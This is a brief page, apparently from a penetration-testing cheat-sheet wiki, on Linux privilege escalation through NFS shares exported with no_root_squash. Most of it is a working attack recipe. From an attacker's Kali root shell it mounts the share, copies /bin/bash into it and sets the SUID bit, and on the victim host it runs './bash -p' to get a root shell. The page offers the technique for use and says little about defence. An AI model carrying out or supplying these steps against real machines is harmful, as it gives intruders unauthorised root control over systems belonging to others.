NFS no_root_squash/no_all_squash

Read the _ /etc/exports _ file, if you find some directory that is configured as no_root_squash, then you can access it from as a client and write inside that directory as if you were the local root of the machine.

#Kali root 
mkdir /tmp/pe
mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe
cd /tmp/pe
cp /bin/bash .
chmod +s bash

#Victim
cd <SHARED_FOLDER>
./bash -p #ROOT shell

Previousfasync_helper|Linux Kernel <2.6.28 Next'Nix manual enumeration

Last updated 2 years ago